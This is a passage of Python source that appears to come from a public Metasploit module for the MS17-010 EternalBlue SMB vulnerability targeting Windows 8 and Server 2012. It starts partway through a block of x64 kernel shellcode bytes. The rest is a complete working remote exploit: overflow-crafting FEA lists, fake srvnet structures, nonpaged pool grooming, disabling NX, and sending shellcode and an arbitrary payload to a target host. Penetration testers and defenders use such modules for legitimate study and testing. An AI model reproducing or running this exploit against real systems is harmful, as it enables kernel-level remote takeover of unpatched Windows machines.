'\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8b\\x24\\x25\\xa8'\n '\\x01\\x00\\x00\\x6a\\x2b\\x65\\xff\\x34\\x25\\x10\\x00\\x00\\x00\\x50\\x50'\n '\\x55\\xe8\\xc5\\xff\\xff\\xff\\x48\\x8b\\x45\\x00\\x48\\x83\\xc0\\x1f\\x48'\n '\\x89\\x44\\x24\\x10\\x51\\x52\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x31'\n '\\xc0\\xb2\\x01\\xf0\\x0f\\xb0\\x55\\xf8\\x75\\x14\\xb9\\x82\\x00\\x00\\xc0'\n '\\x8b\\x45\\x00\\x8b\\x55\\x04\\x0f\\x30\\xfb\\xe8\\x0e\\x00\\x00\\x00\\xfa'\n '\\x41\\x5b\\x41\\x5a\\x41\\x59\\x41\\x58\\x5a\\x59\\x5d\\x58\\xc3\\x41\\x57'\n '\\x41\\x56\\x57\\x56\\x53\\x50\\x4c\\x8b\\x7d\\x00\\x49\\xc1\\xef\\x0c\\x49'\n '\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x66\\x41\\x81\\x3f\\x4d'\n '\\x5a\\x75\\xf1\\x4c\\x89\\x7d\\x08\\x65\\x4c\\x8b\\x34\\x25\\x88\\x01\\x00'\n '\\x00\\xbf\\x78\\x7c\\xf4\\xdb\\xe8\\x01\\x01\\x00\\x00\\x48\\x91\\xbf\\x3f'\n '\\x5f\\x64\\x77\\xe8\\xfc\\x00\\x00\\x00\\x8b\\x40\\x03\\x89\\xc3\\x3d\\x00'\n '\\x04\\x00\\x00\\x72\\x03\\x83\\xc0\\x10\\x48\\x8d\\x50\\x28\\x4c\\x8d\\x04'\n '\\x11\\x4d\\x89\\xc1\\x4d\\x8b\\x09\\x4d\\x39\\xc8\\x0f\\x84\\xc6\\x00\\x00'\n '\\x00\\x4c\\x89\\xc8\\x4c\\x29\\xf0\\x48\\x3d\\x00\\x07\\x00\\x00\\x77\\xe6'\n '\\x4d\\x29\\xce\\xbf\\xe1\\x14\\x01\\x17\\xe8\\xbb\\x00\\x00\\x00\\x8b\\x78'\n '\\x03\\x83\\xc7\\x08\\x48\\x8d\\x34\\x19\\xe8\\xf4\\x00\\x00\\x00\\x3d' + proc_hash +\n '\\x74\\x10\\x3d' + proc_hash + '\\x74\\x09\\x48\\x8b\\x0c' \n '\\x39\\x48\\x29\\xf9\\xeb\\xe0\\xbf\\x48\\xb8\\x18\\xb8\\xe8\\x84\\x00\\x00'\n '\\x00\\x48\\x89\\x45\\xf0\\x48\\x8d\\x34\\x11\\x48\\x89\\xf3\\x48\\x8b\\x5b'\n '\\x08\\x48\\x39\\xde\\x74\\xf7\\x4a\\x8d\\x14\\x33\\xbf\\x3e\\x4c\\xf8\\xce'\n '\\xe8\\x69\\x00\\x00\\x00\\x8b\\x40\\x03\\x48\\x83\\x7c\\x02\\xf8\\x00\\x74'\n '\\xde\\x48\\x8d\\x4d\\x10\\x4d\\x31\\xc0\\x4c\\x8d\\x0d\\xa9\\x00\\x00\\x00'\n '\\x55\\x6a\\x01\\x55\\x41\\x50\\x48\\x83\\xec\\x20\\xbf\\xc4\\x5c\\x19\\x6d'\n '\\xe8\\x35\\x00\\x00\\x00\\x48\\x8d\\x4d\\x10\\x4d\\x31\\xc9\\xbf\\x34\\x46'\n '\\xcc\\xaf\\xe8\\x24\\x00\\x00\\x00\\x48\\x83\\xc4\\x40\\x85\\xc0\\x74\\xa3'\n '\\x48\\x8b\\x45\\x20\\x80\\x78\\x1a\\x01\\x74\\x09\\x48\\x89\\x00\\x48\\x89'\n '\\x40\\x08\\xeb\\x90\\x58\\x5b\\x5e\\x5f\\x41\\x5e\\x41\\x5f\\xc3\\xe8\\x02'\n '\\x00\\x00\\x00\\xff\\xe0\\x53\\x51\\x56\\x41\\x8b\\x47\\x3c\\x41\\x8b\\x84'\n '\\x07\\x88\\x00\\x00\\x00\\x4c\\x01\\xf8\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20'\n '\\x4c\\x01\\xfb\\xff\\xc9\\x8b\\x34\\x8b\\x4c\\x01\\xfe\\xe8\\x1f\\x00\\x00'\n '\\x00\\x39\\xf8\\x75\\xef\\x58\\x8b\\x58\\x24\\x4c\\x01\\xfb\\x66\\x8b\\x0c'\n '\\x4b\\x8b\\x58\\x1c\\x4c\\x01\\xfb\\x8b\\x04\\x8b\\x4c\\x01\\xf8\\x5e\\x59'\n '\\x5b\\xc3\\x52\\x31\\xc0\\x99\\xac\\xc1\\xca\\x0d\\x01\\xc2\\x85\\xc0\\x75'\n '\\xf6\\x92\\x5a\\xc3\\x55\\x53\\x57\\x56\\x41\\x57\\x49\\x8b\\x28\\x4c\\x8b'\n '\\x7d\\x08\\x52\\x5e\\x4c\\x89\\xcb\\x31\\xc0\\x44\\x0f\\x22\\xc0\\x48\\x89'\n '\\x02\\x89\\xc1\\x48\\xf7\\xd1\\x49\\x89\\xc0\\xb0\\x40\\x50\\xc1\\xe0\\x06'\n '\\x50\\x49\\x89\\x01\\x48\\x83\\xec\\x20\\xbf\\xea\\x99\\x6e\\x57\\xe8\\x65'\n '\\xff\\xff\\xff\\x48\\x83\\xc4\\x30\\x85\\xc0\\x75\\x45\\x48\\x8b\\x3e\\x48'\n '\\x8d\\x35\\x4d\\x00\\x00\\x00\\xb9\\x00\\x06\\x00\\x00\\xf3\\xa4\\x48\\x8b'\n '\\x45\\xf0\\x48\\x8b\\x40\\x18\\x48\\x8b\\x40\\x20\\x48\\x8b\\x00\\x66\\x83'\n '\\x78\\x48\\x18\\x75\\xf6\\x48\\x8b\\x50\\x50\\x81\\x7a\\x0c\\x33\\x00\\x32'\n '\\x00\\x75\\xe9\\x4c\\x8b\\x78\\x20\\xbf\\x5e\\x51\\x5e\\x83\\xe8\\x22\\xff'\n '\\xff\\xff\\x48\\x89\\x03\\x31\\xc9\\x88\\x4d\\xf8\\xb1\\x01\\x44\\x0f\\x22'\n '\\xc1\\x41\\x5f\\x5e\\x5f\\x5b\\x5d\\xc3\\x48\\x92\\x31\\xc9\\x51\\x51\\x49'\n '\\x89\\xc9\\x4c\\x8d\\x05\\x0d\\x00\\x00\\x00\\x89\\xca\\x48\\x83\\xec\\x20'\n '\\xff\\xd0\\x48\\x83\\xc4\\x30\\xc3'\n )\n\n# because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000\nNTFEA_SIZE = 0x9000\n\nntfea9000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x260 # with these fea, ntfea size is 0x1c80\nntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\\x00'*0x735d # 0x8fe8 - 0x1c80 - 0xc = 0x735c\nntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\\x00'*0x8148 # overflow to SRVNET_BUFFER_HDR\n\n'''\nReverse from srvnet.sys (Win2012 R2 x64)\n- SrvNetAllocateBufferFromPool() and SrvNetWskTransformedReceiveComplete():\n\n// size 0x90\nstruct SRVNET_BUFFER_HDR {\n LIST_ENTRY list;\n USHORT flag; // 2 least significant bit MUST be clear. if 0x1 is set, pmdl pointers are access. if 0x2 is set, go to lookaside.\n char unknown0[6];\n char *pNetRawBuffer; // MUST point to valid address (check if this request is \"\\xfdSMB\")\n DWORD netRawBufferSize; // offset: 0x20\n DWORD ioStatusInfo;\n DWORD thisNonPagedPoolSize; // will be 0x82e8 for netRawBufferSize 0x8100\n DWORD pad2;\n char *thisNonPagedPoolAddr; // 0x30 points to SRVNET_BUFFER\n PMDL pmdl1; // point at offset 0x90 from this struct\n DWORD nByteProcessed; // 0x40\n char unknown4[4];\n QWORD smbMsgSize; // MUST be modified to size of all recv data\n PMDL pmdl2; // 0x50: if want to free corrupted buffer, need to set to valid address\n QWORD pSrvNetWskStruct; // want to change to fake struct address\n DWORD unknown6; // 0x60\n char unknown7[12];\n char unknown8[0x20];\n};\n\nstruct SRVNET_BUFFER {\n char transportHeader[80]; // 0x50\n char buffer[reqSize+padding]; // 0x8100 (for pool size 0x82f0), 0x10100 (for pool size 0x11000)\n SRVNET_BUFFER_HDR hdr; //some header size 0x90\n //MDL mdl1; // target\n};\n\nIn Windows 8, the srvnet buffer metadata is declared after real buffer. We need to overflow through whole receive buffer.\nBecause transaction max data count is 66512 (0x103d0) in SMB_COM_NT_TRANSACT command and\n DataDisplacement is USHORT in SMB_COM_TRANSACTION2_SECONDARY command, we cannot send large trailing data after FEALIST.\nSo the possible srvnet buffer pool size is 0x82f0. With this pool size, we need to overflow more than 0x8150 bytes.\nIf exploit cannot overflow to prepared SRVNET_BUFFER, the target is likely to crash because of big overflow.\n'''\n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing\n# Here is the important fields on x64\n# - offset 0x18 (VOID*) : pointer to received SMB message buffer. This value MUST be valid address because there is\n# a check in SrvNetWskTransformedReceiveComplete() if this message starts with \"\\xfdSMB\".\n# - offset 0x48 (QWORD) : the SMB message length from packet header (first 4 bytes).\n# This value MUST be exactly same as the number of bytes we send.\n# Normally, this value is 0x80 + len(fake_struct) + len(shellcode)\n# - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.\n# The value MUST point to valid (might be fake) struct.\n# - offset 0x90 (MDL) : MDL for describe receiving SMB request buffer\n# - 0x90 (VOID*) : MDL.Next should be NULL\n# - 0x98 (USHORT) : MDL.Size should be some value that not too small\n# - 0x9a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)\n# - 0x90 (VOID*) : MDL.Process should be NULL\n# - 0x98 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.\n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).\n#\n#\n# To free the corrupted srvnet buffer (not necessary), shellcode MUST modify some memory value to satisfy condition.\n# Here is related field for freeing corrupted buffer\n# - offset 0x10 (USHORT): 2 least significant bit MUST be clear. Just set to 0xfff0\n# - offset 0x30 (VOID*) : MUST be fixed to correct value in shellcode. This is the value that passed to ExFreePoolWithTag()\n# - offset 0x40 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0\n# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to\n# your shellcode as function argument\n# - offset 0x50 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set\n# The last condition is your shellcode MUST return non-negative value. The easiest way to do is \"xor eax,eax\" before \"ret\".\n# Here is x64 assembly code for setting nByteProcessed field\n# - fetch SRVNET_BUFFER address from function argument\n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40]\n# - fix pool pointer (rcx is -0x8150 because of fake_recv_struct below)\n# \\x48\\x01\\xd1 add rcx, rdx\n# \\x48\\x89\\x4a\\x30 mov [rdx+0x30], rcx\n# - set nByteProcessed for trigger free after return\n# \\x8b\\x4a\\x48 mov ecx, [rdx+0x48]\n# \\x89\\x4a\\x40 mov [rdx+0x40], ecx\n\n# debug mode affects HAL heap. The 0xffffffffffd04000 address should be useable no matter what debug mode is.\n# The 0xffffffffffd00000 address should be useable when debug mode is not enabled\n# The 0xffffffffffd01000 address should be useable when debug mode is enabled\nTARGET_HAL_HEAP_ADDR = 0xffffffffffd04000 # for put fake struct and shellcode\n\n# Note: feaList will be created after knowing shellcode size.\n\n# feaList for disabling NX is possible because we just want to change only MDL.MappedSystemVa\n# PTE of 0xffffffffffd00000 is at 0xfffff6ffffffe800\n# NX bit is at PTE_ADDR+7\n# MappedSystemVa = PTE_ADDR+7 - 0x7f\nSHELLCODE_PAGE_ADDR = (TARGET_HAL_HEAP_ADDR + 0x400) & 0xfffffffffffff000\nPTE_ADDR = 0xfffff6ffffffe800 + 8*((SHELLCODE_PAGE_ADDR-0xffffffffffd00000) >> 12)\nfakeSrvNetBufferX64Nx = '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR) # _, _, pointer to fake struct\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += '\\x00'*16\nfakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\nfakeSrvNetBufferX64Nx += pack('<QQ', 0, PTE_ADDR+7-0x7f) # MDL.Process, MDL.MappedSystemVa\n\nfeaListNx = pack('<I', 0x10000)\nfeaListNx += ntfea9000\nfeaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\\x00' is for name\n# stop copying by invalid flag (can be any value except 0 and 0x80)\nfeaListNx += pack('<BBH', 0x12, 0x34, 0x5678)\n\n\ndef createFakeSrvNetBuffer(sc_size):\n # 0x180 is size of fakeSrvNetBufferX64\n totalRecvSize = 0x80 + 0x180 + sc_size\n fakeSrvNetBufferX64 = '\\x00'*16\n fakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR) # flag, _, _, pNetRawBuffer\n fakeSrvNetBufferX64 += pack('<QII', 0, 0x82e8, 0) # _, thisNonPagedPoolSize, _\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize) # offset 0x40\n fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR) # pmdl2, pointer to fake struct\n fakeSrvNetBufferX64 += pack('<QQ', 0, 0)\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += '\\x00'*16\n fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\n fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80) # MDL.Process, MDL.MappedSystemVa\n return fakeSrvNetBufferX64\n\ndef createFeaList(sc_size):\n feaList = pack('<I', 0x10000)\n feaList += ntfea9000\n fakeSrvNetBuf = createFakeSrvNetBuffer(sc_size)\n feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf # -1 because first '\\x00' is for name\n # stop copying by invalid flag (can be any value except 0 and 0x80)\n feaList += pack('<BBH', 0x12, 0x34, 0x5678)\n return feaList\n\n# fake struct for SrvNetWskTransformedReceiveComplete() and SrvNetCommonReceiveHandler()\n# x64: fake struct is at ffffffff ffd00e00\n# offset 0x50: KSPIN_LOCK\n# offset 0x58: LIST_ENTRY must be valid address. cannot be NULL.\n# offset 0x110: array of pointer to function\n# offset 0x13c: set to 3 (DWORD) for invoking ptr to function\n# some useful offset\n# offset 0x120: arg1 when invoking ptr to function\n# offset 0x128: arg2 when invoking ptr to function\n#\n# code path to get code exection after this struct is controlled\n# SrvNetWskTransformedReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr\nfake_recv_struct = ('\\x00'*16)*5\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58) # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself)\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0) # offset 0x60\nfake_recv_struct += ('\\x00'*16)*10\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0) # offset 0x110: fn_ptr array\nfake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0) # set arg1 to -0x8150\nfake_recv_struct += pack('<QII', 0, 0, 3) # offset 0x130\nfake_recv_struct += ('\\x00'*16)*3\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180) # shellcode address\n\n\ndef getNTStatus(self):\n return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']\nif not dependencies_missing:\n setattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus)\n\ndef sendEcho(conn, tid, data):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)\n transCommand['Parameters'] = smb.SMBEcho_Parameters()\n transCommand['Data'] = smb.SMBEcho_Data()\n\n transCommand['Parameters']['EchoCount'] = 1\n transCommand['Data']['Data'] = data\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('got good ECHO response')\n else:\n module.log('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()), 'error')\n\n\n# override SMB.neg_session() to allow forcing ntlm authentication\nif not dependencies_missing:\n class MYSMB(smb.SMB):\n def __init__(self, remote_host, port, use_ntlmv2=True):\n self.__use_ntlmv2 = use_ntlmv2\n smb.SMB.__init__(self, remote_host, remote_host, sess_port = port)\n\n def neg_session(self, extended_security = True, negPacket = None):\n smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)\n\ndef createSessionAllocNonPaged(target, port, size, username, password):\n conn = MYSMB(target, port, use_ntlmv2=False) # with this negotiation, FLAGS2_EXTENDED_SECURITY is not set\n _, flags2 = conn.get_flags()\n # if not use unicode, buffer size on target machine is doubled because converting ascii to utf16\n if size >= 0xffff:\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\n reqSize = size // 2\n else:\n flags2 |= smb.SMB.FLAGS2_UNICODE\n reqSize = size\n conn.set_flags(flags2=flags2)\n\n pkt = smb.NewSMBPacket()\n\n sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)\n sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()\n\n sessionSetup['Parameters']['MaxBufferSize'] = 61440 # can be any value greater than response size\n sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value\n sessionSetup['Parameters']['VcNumber'] = 2 # any non-zero\n sessionSetup['Parameters']['SessionKey'] = 0\n sessionSetup['Parameters']['SecurityBlobLength'] = 0 # this is OEMPasswordLen field in another format. 0 for NULL session\n sessionSetup['Parameters']['Capabilities'] = smb.SMB.CAP_EXTENDED_SECURITY | smb.SMB.CAP_USE_NT_ERRORS\n\n sessionSetup['Data'] = pack('<H', reqSize) + '\\x00'*20\n pkt.addCommand(sessionSetup)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('SMB1 session setup allocate nonpaged pool success')\n return conn\n\n if username:\n # Try login with valid user because anonymous user might get access denied on Windows Server 2012.\n # Note: If target allows only NTLMv2 authentication, the login will always fail.\n # support only ascii because I am lazy to implement Unicode (need pad for alignment and converting username to utf-16)\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\n reqSize = size // 2\n conn.set_flags(flags2=flags2)\n\n # new SMB packet to reset flags\n pkt = smb.NewSMBPacket()\n pwd_unicode = conn.get_ntlmv1_response(ntlm.compute_nthash(password))\n # UnicodePasswordLen field is in Reserved for extended security format.\n sessionSetup['Parameters']['Reserved'] = len(pwd_unicode)\n sessionSetup['Data'] = pack('<H', reqSize+len(pwd_unicode)+len(username)) + pwd_unicode + username + '\\x00'*16\n pkt.addCommand(sessionSetup)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('SMB1 session setup allocate nonpaged pool success')\n return conn\n\n # lazy to check error code, just print fail message\n module.log('SMB1 session setup allocate nonpaged pool failed', 'error')\n sys.exit(1)\n\n\n# Note: impacket-0.9.15 struct has no ParameterDisplacement\n############# SMB_COM_TRANSACTION2_SECONDARY (0x33)\nif not dependencies_missing:\n class SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):\n structure = (\n ('TotalParameterCount', '<H=0'),\n ('TotalDataCount', '<H'),\n ('ParameterCount', '<H=0'),\n ('ParameterOffset', '<H=0'),\n ('ParameterDisplacement', '<H=0'),\n ('DataCount', '<H'),\n ('DataOffset', '<H'),\n ('DataDisplacement', '<H=0'),\n ('FID', '<H=0'),\n )\n\ndef send_trans2_second(conn, tid, data, displacement):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n # assume no params\n\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)\n transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()\n transCommand['Data'] = smb.SMBTransaction2Secondary_Data()\n\n transCommand['Parameters']['TotalParameterCount'] = 0\n transCommand['Parameters']['TotalDataCount'] = len(data)\n\n fixedOffset = 32+3+18\n transCommand['Data']['Pad1'] = ''\n\n transCommand['Parameters']['ParameterCount'] = 0\n transCommand['Parameters']['ParameterOffset'] = 0\n\n if len(data) > 0:\n pad2Len = (4 - fixedOffset % 4) % 4\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\n else:\n transCommand['Data']['Pad2'] = ''\n pad2Len = 0\n\n transCommand['Parameters']['DataCount'] = len(data)\n transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len\n transCommand['Parameters']['DataDisplacement'] = displacement\n\n transCommand['Data']['Trans_Parameters'] = ''\n transCommand['Data']['Trans_Data'] = data\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n\n\ndef send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n command = pack('<H', setup)\n\n # Use SMB_COM_NT_TRANSACT because we need to send data >65535 bytes to trigger the bug.\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)\n transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()\n transCommand['Parameters']['MaxSetupCount'] = 1\n transCommand['Parameters']['MaxParameterCount'] = len(param)\n transCommand['Parameters']['MaxDataCount'] = 0\n transCommand['Data'] = smb.SMBTransaction2_Data()\n\n transCommand['Parameters']['Setup'] = command\n transCommand['Parameters']['TotalParameterCount'] = len(param)\n transCommand['Parameters']['TotalDataCount'] = len(data)\n\n fixedOffset = 32+3+38 + len(command)\n if len(param) > 0:\n padLen = (4 - fixedOffset % 4 ) % 4\n padBytes = '\\xFF' * padLen\n transCommand['Data']['Pad1'] = padBytes\n else:\n transCommand['Data']['Pad1'] = ''\n padLen = 0\n\n transCommand['Parameters']['ParameterCount'] = len(param)\n transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen\n\n if len(data) > 0:\n pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\n else:\n transCommand['Data']['Pad2'] = ''\n pad2Len = 0\n\n transCommand['Parameters']['DataCount'] = firstDataFragmentSize\n transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len\n\n transCommand['Data']['Trans_Parameters'] = param\n transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB() # must be success\n if recvPkt.getNTStatus() == 0:\n module.log('got good NT Trans response')\n else:\n module.log('got bad NT Trans response: 0x{:x}'.format(recvPkt.getNTStatus()), 'error')\n sys.exit(1)\n\n # Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data\n i = firstDataFragmentSize\n while i < len(data):\n sendSize = min(4096, len(data) - i)\n if len(data) - i <= 4096:\n if not sendLastChunk:\n break\n send_trans2_second(conn, tid, data[i:i+sendSize], i)\n i += sendSize\n\n if sendLastChunk:\n conn.recvSMB()\n return i\n\n\n# connect to target and send a large nbss size with data 0x80 bytes\n# this method is for allocating big nonpaged pool on target\ndef createConnectionWithBigSMBFirst80(target, port, for_nx=False):\n sk = socket.create_connection((target, port))\n pkt = '\\x00' + '\\x00' + pack('>H', 0x8100)\n # There is no need to be SMB2 because we want the target free the corrupted buffer.\n # Also this is invalid SMB2 message.\n # I believe NSA exploit use SMB2 for hiding alert from IDS\n #pkt += '\\xfeSMB' # smb2\n # it can be anything even it is invalid\n pkt += 'BAAD' # can be any\n if for_nx:\n # MUST set no delay because 1 byte MUST be sent immediately\n sk.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n pkt += '\\x00'*0x7b # another byte will be sent later to disabling NX\n else:\n pkt += '\\x00'*0x7c\n sk.send(pkt)\n return sk\n\n\ndef _exploit(target, port, feaList, shellcode, numGroomConn, username, password):\n # force using smb.SMB for SMB1\n conn = smb.SMB(target, target, sess_port = port)\n conn.login(username, password)\n server_os = conn.get_server_os()\n module.log('Target OS: '+server_os)\n if server_os.startswith(\"Windows 10 \"):\n build = int(server_os.split()[-1])\n if build >= 14393: # version 1607\n module.log('This exploit does not support this build: {} >= 14393'.format(build), 'error')\n sys.exit(1)\n elif not (server_os.startswith(\"Windows 8\") or server_os.startswith(\"Windows Server 2012 \")):\n module.log('This exploit does not support this target: {}'.format(server_os), 'error')\n sys.exit(1)\n\n tid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\n\n # The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.\n # Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment\n progress = send_big_trans2(conn, tid, 0, feaList, '\\x00'*30, len(feaList)%4096, False)\n\n # Another TRANS2_OPEN2 (0) with special feaList for disabling NX\n nxconn = smb.SMB(target, target, sess_port = port)\n nxconn.login(username, password)\n nxtid = nxconn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\n nxprogress = send_big_trans2(nxconn, nxtid, 0, feaListNx, '\\x00'*30, len(feaList)%4096, False)\n\n # create some big buffer at server\n # this buffer MUST NOT be big enough for overflown buffer\n allocConn = createSessionAllocNonPaged(target, port, NTFEA_SIZE - 0x2010, username, password)\n\n # groom nonpaged pool\n # when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one\n srvnetConn = []\n for i in range(numGroomConn):\n sk = createConnectionWithBigSMBFirst80(target, port, for_nx=True)\n srvnetConn.append(sk)\n\n # create buffer size NTFEA_SIZE at server\n # this buffer will be replaced by overflown buffer\n holeConn = createSessionAllocNonPaged(target, port, NTFEA_SIZE-0x10, username, password)\n # disconnect allocConn to free buffer\n # expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer\n allocConn.get_socket().close()\n\n # hope one of srvnetConn is next to holeConn\n for i in range(5):\n sk = createConnectionWithBigSMBFirst80(target, port, for_nx=True)\n srvnetConn.append(sk)\n\n # remove holeConn to create hole for fea buffer\n holeConn.get_socket().close()\n\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\n # first trigger, overwrite srvnet buffer struct for disabling NX\n send_trans2_second(nxconn, nxtid, feaListNx[nxprogress:], nxprogress)\n recvPkt = nxconn.recvSMB()\n retStatus = recvPkt.getNTStatus()\n if retStatus == 0xc000000d:\n module.log('good response status for nx: INVALID_PARAMETER')\n else:\n module.log('bad response status for nx: 0x{:08x}'.format(retStatus), 'error')\n\n # one of srvnetConn struct header should be modified\n # send '\\x00' to disable nx\n for sk in srvnetConn:\n sk.send('\\x00')\n\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\n # second trigger, place fake struct and shellcode\n send_trans2_second(conn, tid, feaList[progress:], progress)\n recvPkt = conn.recvSMB()\n retStatus = recvPkt.getNTStatus()\n if retStatus == 0xc000000d:\n module.log('good response status: INVALID_PARAMETER')\n else:\n module.log('bad response status: 0x{:08x}'.format(retStatus), 'error')\n\n # one of srvnetConn struct header should be modified\n # a corrupted buffer will write recv data in designed memory address\n for sk in srvnetConn:\n sk.send(fake_recv_struct + shellcode)\n\n # execute shellcode\n for sk in srvnetConn:\n sk.close()\n\n # nicely close connection (no need for exploit)\n nxconn.disconnect_tree(tid)\n nxconn.logoff()\n nxconn.get_socket().close()\n conn.disconnect_tree(tid)\n conn.logoff()\n conn.get_socket().close()\n\n\ndef exploit(args):\n if dependencies_missing:\n module.log('Module dependencies (impacket) missing, cannot continue', 'error')\n sys.exit(1)\n\n # XXX: Normalize strings to ints and unset options to empty strings\n rport = int(args['RPORT'])\n numGroomConn = int(args['GroomAllocations'])\n smbuser = args['SMBUser'] if 'SMBUser' in args else ''\n smbpass = args['SMBPass'] if 'SMBPass' in args else ''\n\n # XXX: JSON-RPC requires UTF-8, so we Base64-encode the binary payload\n sc = eternalblue_kshellcode_x64(args['ProcessName']) + b64decode(args['payload_encoded'])\n\n if len(sc) > 0xe80:\n module.log('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80), 'error')\n sys.exit(1)\n\n # Now, shellcode is known. create a feaList\n feaList = createFeaList(len(sc))\n\n module.log('shellcode size: {:d}'.format(len(sc)))\n module.log('numGroomConn: {:d}'.format(numGroomConn))\n\n try:\n _exploit(args['RHOST'], rport, feaList, sc, numGroomConn, smbuser, smbpass)\n # XXX: Catch everything until we know better\n except Exception as e:\n module.log(str(e), 'error')\n sys.exit(1)\n\n module.log('done')\n\n\nif __name__ == '__main__':\n module.run(metadata, exploit)\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", "title": "MS17-010 EternalBlue SMB Remote 